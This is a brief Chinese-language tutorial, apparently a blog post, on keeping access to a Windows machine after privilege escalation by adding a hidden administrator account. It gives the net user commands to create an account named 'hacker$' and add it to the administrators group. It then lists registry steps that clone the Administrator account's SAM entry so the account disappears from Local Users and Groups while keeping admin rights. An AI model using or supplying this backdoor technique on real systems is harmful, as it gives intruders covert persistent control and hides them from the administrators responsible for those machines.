win添加隐藏账户

0、简介

提权成功后,维持权限可以添加隐藏账户。

1、命令行隐藏

1
2
3
# 创建用户时使用$符号,这样添加的用户,命令行不会显示
net user hacker$ password /add
net localgroup administrators hacker$ /add

img

  • 在计算机管理—>本地用户和组中,还是可以看到刚创建的用户

img

2、注册表隐藏

  1. 更改 HKEY_LOCAL_MACHINE\SAM\SAM 权限,为 Administrators 组添加权限
  2. F5刷新一下,在注册表中找到 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$ ,找到其类型000003EB后和 hacker$一同导出
  3. 找到 Administrator 对应类型 000001F4 导出,编辑导出的文件
  4. 删除 hacker$ 用户,然后导入 hacker$.reg000003EB.reg
  5. 发现本地用户和组 账户已经隐藏
  6. 登录 hacker$,administrator权限

img

img

img

img